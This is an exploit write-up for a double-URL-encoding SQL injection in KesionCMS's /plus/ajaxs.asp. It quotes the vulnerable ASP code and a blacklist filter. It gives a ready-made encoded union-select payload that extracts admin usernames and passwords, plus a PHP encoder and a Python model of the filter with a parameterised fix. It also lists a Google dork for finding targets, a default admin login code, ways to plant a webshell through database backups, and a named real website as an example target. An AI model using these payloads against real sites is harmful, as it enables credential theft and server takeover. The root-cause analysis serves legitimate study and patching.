Affected Versions: kesion v6.0-v7.0 and kesion v7.06 eshop
The quotation marks are there because this is not really a 0day: the root cause is the same filter function, and an earlier vulnerability with the same root cause has already been disclosed. The original one was in /user/Reg/regajax.asp; this one is in /plus/ajaxs.asp. Both work on the same principle and both come from the inadequate filtering done by the S function.
Look at the dispatcher at the top of /plus/ajaxs.asp:
Dim KS: Set KS = New PublicCls
Dim Action
Action = KS.S("Action")
Select Case Action
    ' handler calls missing after some Case labels below were cut off in the original listing
    Case "Ctoe": CtoE
    Case "GetTags": GetTags
    Case "GetRelativeItem": GetRelativeItem
    Case "Shop_GetCoupon"
    Case "Shop_ValidateCoupon"
    Case "Shop_BrandOption"
    Case "Shop_CheckProID"
    Case "GetClassOption"
    Case "GetFieldOption"
    Case "SpecialSubList": SpecialSubList
    Case "GetArea": GetArea
    Case "GetFunc": GetFunc
    Case "AddFriend": AddFriend
    Case "MessageSave"
    Case "CheckMyFriend"
    Case "SendMsg"
    Case "SearchUser"
    Case "CheckLogin"
    Case "relativeDoc"
    Case "getModelType"
    Case "getDocImage": getDocImage
    Case "checkDocFname"
    Case "addCart": addShoppingCart
    Case "GetPackagePro": GetPackagePro
    Case "GetSupplyContact"
    Case "HitsGuangGao"
    Case "GetClubBoardOption"
    Case "getclubboard": GetClubboard
    Case "getonlinelist"
End Select
... snip ...
'Related information
Sub GetRelativeItem()                                       ' the vulnerable handler
    Dim Key: Key = UnEscape(KS.S("Key"))                    ' the vulnerable line: only KS.S filters Key, and the result is then URL-decoded again
    Dim Rtitle: Rtitle = LCase(KS.G("rtitle"))
    Dim RKey: RKey = LCase(KS.G("Rkey"))
    Dim ChannelID: ChannelID = KS.ChkClng(KS.S("Channelid"))
    Dim ID: ID = KS.ChkClng(KS.G("ID"))
    Dim Param, RS, SQL, k, SqlStr
    If Key <> "" Then
        If (Rtitle = "true" Or RKey = "true") Then
            If Rtitle = "true" Then
                Param = Param & "title like '%" & Key & "%'"  ' Key is concatenated straight into a LIKE pattern: search-type injection
            End If
            If RKey = "true" Then
                If Param = "" Then
                    Param = Param & "keywords like '%" & Key & "%'"
                Else
                    Param = Param & " or keywords like '%" & Key & "%'"
                End If
            End If
        Else
            Param = Param & "keywords like '%" & Key & "%'"
        End If
    End If
    If Param <> "" Then
        Param = " where InfoID<>" & ID & " and (" & Param & ")"
    Else
        Param = " where InfoID<>" & ID
    End If
    If ChannelID <> 0 Then Param = Param & " and ChannelID=" & ChannelID
    Param = Param & " and verific=1"
    SqlStr = "Select top 30 ChannelID,InfoID,Title From KS_ItemInfo" & Param & " order by id desc"  ' the query that runs
    Set RS = Server.CreateObject("ADODB.RECORDSET")
    RS.Open SqlStr, conn, 1, 1
    If Not RS.Eof Then
        SQL = RS.GetRows(-1)
    End If
    RS.Close
    ' ... output of the result set omitted in the original listing
End Sub
Look at the line Key = UnEscape(KS.S("Key")): the value first goes through the user-defined filter KS.S and is then decoded a second time with UnEscape.
The filter functions are defined in /KS_Cls/kesion.commoncls.asp:
Function DelSql(Str)
    Dim SplitSqlStr, SplitSqlArr, I
    SplitSqlStr = "dbcc|alter|drop|*|and|exec|or|insert|select|delete|update|count|master|truncate|declare|char|mid|chr|set|where|xp_cmdshell"
    SplitSqlArr = Split(SplitSqlStr, "|")
    For I = LBound(SplitSqlArr) To UBound(SplitSqlArr)
        ' case-insensitive substring match against the blacklist
        If InStr(LCase(Str), SplitSqlArr(I)) > 0 Then
            Die "<script>alert('System warning!\n\n1. The data you submitted contains the malicious character " & SplitSqlArr(I) & ";\n2. Your data has been recorded;\n3. Your IP address: " & GetIP & ";\n4. Operation date: " & Now & ";\nPowered By Kesion.com!');window.close();</script>"
        End If
    Next
    DelSql = Str
End Function
'Get the value of Request.QueryString or Request.Form
Public Function S(Str)
    S = DelSql(Replace(Request(Str), "'", ""))
End Function
That is the whole filter: S() drops single quotes and runs the DelSql blacklist over the value as Request() delivers it, that is after one round of URL decoding, and GetRelativeItem then calls UnEscape() on the result. Anything the filter would catch can therefore be sent URL-encoded twice: Request() turns %2527 into %27, which contains neither a literal quote nor a blacklisted word, so it passes S(), and UnEscape() then turns %27 back into a quote. The same goes for keywords such as select. This is the same class of double-decoding bypass familiar from PHP applications.
Whether the payload reaches that code depends on the dispatcher at the top of the file:
Dim KS: Set KS = New PublicCls
Dim Action
Action = KS.S("Action")
Select Case Action
    Case "Ctoe": CtoE
    Case "GetTags": GetTags
    Case "GetRelativeItem": GetRelativeItem
When Action is GetRelativeItem the dispatcher calls GetRelativeItem(). That function only checks that Key is non-empty, so any harmless value, such as conqu3r, can be placed in front of the payload; the rest is an ordinary search-type (LIKE) injection.
Double-URL-encode %') union select 1,2,username+'|'+password from KS_Admin and append it to the key parameter:
/plus/ajaxs.asp?Action=GetRelativeItem&key=conqu3r%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
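To make the filter chain concrete, here is a model of it in Python. This is example code added for this page, not Kesion's code and not the author's converter: it approximates ASP's Request() decoding and VBScript's UnEscape() with urllib.parse.unquote (an assumption; %uXXXX sequences are not modelled), uses the DelSql blacklist quoted above, rebuilds the GetRelativeItem query for the rtitle/rkey-unset branch, reproduces the page's %25XX encoding step, and shows the parameterised LIKE query that would have closed the hole. The KS_ItemInfo rows are constructed sample data.

```python
"""Model of the KesionCMS /plus/ajaxs.asp filter chain (added example, not Kesion code).

Assumptions (not from the page): ASP Request() is modelled as one round of %XX
decoding and VBScript UnEscape() as a second round; both use urllib.parse.unquote.
"""
import sqlite3
from urllib.parse import unquote

# DelSql's blacklist as quoted on the page: case-insensitive substring match
BLACKLIST = ("dbcc|alter|drop|*|and|exec|or|insert|select|delete|update|count|"
             "master|truncate|declare|char|mid|chr|set|where|xp_cmdshell").split("|")

# The injection fragment from the page, before encoding
PAYLOAD = "%') union select 1,2,username+'|'+password from KS_Admin"

# Constructed rows standing in for KS_ItemInfo (ChannelID, InfoID, Title, keywords, verific)
SAMPLE_ROWS = [
    (1, 10, "Release notes", "kesion,cms,release", 1),
    (1, 11, "Unverified draft", "kesion,draft", 0),
]


class Blocked(Exception):
    """Raised where DelSql would Die() with its 'System warning' alert."""


def del_sql(value: str) -> str:
    low = value.lower()
    for word in BLACKLIST:
        if word in low:
            raise Blocked(word)
    return value


def ks_s(raw_query_value: str) -> str:
    """KS.S(): Request() decodes %XX once, single quotes are dropped, then DelSql runs."""
    return del_sql(unquote(raw_query_value).replace("'", ""))


def is_blocked(raw_query_value: str) -> bool:
    try:
        ks_s(raw_query_value)
    except Blocked:
        return True
    return False


def get_relative_item_sql(raw_key: str, info_id: int = 0, channel_id: int = 0) -> str:
    """Build the query the way GetRelativeItem does when rtitle/rkey are not 'true'."""
    key = unquote(ks_s(raw_key))          # UnEscape(KS.S("Key")): the second decode
    param = ""
    if key != "":
        param = "keywords like '%" + key + "%'"
    if param:
        param = " where InfoID<>%d and (%s)" % (info_id, param)
    else:
        param = " where InfoID<>%d" % info_id
    if channel_id:
        param += " and ChannelID=%d" % channel_id
    param += " and verific=1"
    return "Select top 30 ChannelID,InfoID,Title From KS_ItemInfo" + param + " order by id desc"


def double_encode(sql_fragment: str, null_terminate: bool = False) -> str:
    """Every byte becomes %25XX, the transformation the page's PHP converter performs.
    After Request() this is %XX (passes KS.S); after UnEscape() it is the original byte."""
    out = "".join("%%25%02x" % b for b in sql_fragment.encode("latin-1"))
    return out + ("%2500" if null_terminate else "")   # optional trailing encoded null byte


def hardened_lookup(key: str, rows):
    """Parameterised form of the same LIKE search: the key is bound as data, never spliced
    into SQL, so the union fragment is just an unmatched pattern. In-memory SQLite stands in
    for KS_ItemInfo (an assumption; Kesion used Access or MSSQL through ADO)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table KS_ItemInfo(ChannelID int, InfoID int, Title text, keywords text, verific int)")
    con.executemany("insert into KS_ItemInfo values (?,?,?,?,?)", rows)
    cur = con.execute(
        "select ChannelID, InfoID, Title from KS_ItemInfo "
        "where InfoID<>? and keywords like ? and verific=1 order by InfoID desc limit 30",
        (0, "%" + key + "%"))
    return cur.fetchall()


if __name__ == "__main__":
    print("single-encoded blocked:", is_blocked("conqu3r%27%29%20union%20select%201"))
    print("double-encoded blocked:", is_blocked("conqu3r" + double_encode(PAYLOAD)))
    print(get_relative_item_sql("conqu3r" + double_encode(PAYLOAD)))
    print("parameterised result:", hardened_lookup(PAYLOAD, SAMPLE_ROWS))
```

Running it shows the single-encoded payload stopped by DelSql on "select", the double-encoded one passing S() untouched and then being decoded into the query text, and the parameterised query treating the very same key as an ordinary (non-matching) pattern.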
If the backend is MSSQL and the database account has the necessary privileges, a webshell can be written directly by means of a database backup.
The same parameter can also be used to trigger a CLng type-conversion error, whose error message discloses the physical path:
Method:
/plus/ajaxs.asp?Action=GetRelativeItem&key=%25
Google keyword: intext:Powered By KesionCMS
Default backend: /admin/login.asp, default authentication code: 8888
Ways to get a webshell from the backend:
1. Run an SQL statement from the backend and export a webshell through the Access database;
2. Insert a one-line webshell into the database and back the database up to an .asp file.
Instance: http://www.allvison.com//plus/ajaxs.asp?Action=GetRelativeItem&key=conqu3r%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
The conversion script used for the encoding:
<?php
// Kesioncms command-line conversion program, by conqu3r
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
==============================================================
Kesioncms command line conversion program
------ By conqu3r
==============================================================
');
if ($argc < 2) {
    print_r('
==============================================================
Usage:   php ' . $argv[0] . ' "SQL code"
Example: php ' . $argv[0] . ' "%\') union select ..."
==============================================================
');
    die;
}
$str = $argv[1];
$temp = "";
// Every byte becomes %25XX: Request() decodes it once to %XX, which passes KS.S,
// and UnEscape() then restores the original character.
for ($i = 0; $i < strlen($str); $i++) {
    $temp .= "%25" . str_pad(base_convert(ord($str[$i]), 10, 16), 2, "0", STR_PAD_LEFT);
}
// Trailing encoded null byte. The original script produced it by reading one
// position past the end of the string (ord("") is 0) and appending a literal "0".
echo $temp . "%2500";
?>